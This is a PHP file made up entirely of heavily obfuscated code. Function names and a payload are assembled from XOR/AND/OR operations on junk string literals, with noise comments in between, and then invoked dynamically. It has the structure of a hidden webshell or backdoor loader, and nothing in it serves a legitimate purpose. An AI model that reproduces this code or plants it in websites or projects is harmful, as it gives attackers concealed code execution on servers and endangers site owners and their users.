<?php
$WWgmGJi0Z9J='TBnF'^bkyxJdfI2e;$Z1fSweAnPPf='}l5'&'}mu';$eqndw=er1|'O$-';$Iu2q0JC=#OxQCo6Cx'.
             '(@G$7I'|"9@@ -D";$qbKMxyVoXJ="V !AQ*"|'^%3@P;';$zB='TS#4)<7?A1Q@KY='^#jSROzQB'.
             '7!LW]'.IhA6.'^"<"6C';$uVjuc="{".dWiTz."%W_W?>~{".oSbrA."*".ydVy_o."}Yz]W/"&/*'.
             'Poaj>v*/"Wo|kwO(^K[kw;"._okfSY."{s U?"._nyyVuw.">";$jp2yd7GYk='FH+{'^#y7B_4ym'.
             '>nD=';$HAoJET_h7JJ='@'|'@';$Uz6qISEG='I]N8.w<Q'^'?t+'.RcEx.'>';$vRNU=#wI5tRNI'.
             ')z=0(X()'|'(X5#*^* ';$Ox6xCH='$e'&'f{';$sDaZHCh7=HTPPMA|HTDPW.'@';'kdmk3PKT95'.
             '?O]NU';$v2e_lHzq=g&m;$F52xiZs='+4'^'S]';$Re=D^"0";$hZmT4fKj='510 #n!t"'./*wqI'.
             'M@5$a[6S>*/uu8bo^'}edp|6~!r*6y.#';$XK="[NG_"&M_w_;$wQm9='sv=;|0'^'??s~#y';'o6'.
             'R+bd2h';$ge=w&L;$Lup5=$Z1fSweAnPPf&$eqndw;$RcQEcu8KG=$Iu2q0JC^$qbKMxyVoXJ;'ZT'.
             'c2zu';$Rn4=('N5.6;F[2#^=R'^'4'.CAAd4.'>HO=F7')&('paA#TEI@l%c}'|'@'./*fQHeYNud'.
             '-we~X6c5*/seF_7t0iAAY);$NPzx=$zB&('c{m{~m_v}'.oowkoo&'k{eq~m_g}~o}{o~');'YuiL'.
             ']9M';$LF30_r2RjRU=('(R&H%,@! @'.LSHND.'@Pb"H@F$'.X8VM.'. !$J'|KR6Z7./*gBzRiu9'.
             'Ua*/" DB)!".CPQl."]1J`sKD@eP,".BClEE4C)^$uVjuc;$Gx51KHWb=$jp2yd7GYk^(#ePxHySo'.
             'UA@#'|'RG@ ');$pi=('-'&'3')|$HAoJET_h7JJ;$dRo5=$Uz6qISEG^$vRNU;$Lup5(/*SX3Cbb'.
             '<SOHeU|*/$RcQEcu8KG($sDaZHCh7))==$LF30_r2RjRU or $Rn4($Gx51KHWb,$v2e_lHzq./*C'.
             'P*/$F52xiZs.$Re,$pi);$AS9vqYNX=$NPzx($Ox6xCH,$RcQEcu8KG($hZmT4fKj.$XK./*Gsyrd'.
             '}w(Od*/$wQm9.$ge));$AS9vqYNX($dRo5);#l!i(:pc%5d>bFC>S|s _FO(dDEXnx7J&T;%lW_J'.
             '| {i0L QM.F07jf<2Q_CWQ9jJr)$t;iEg.3LZep5otpN(3zkw';
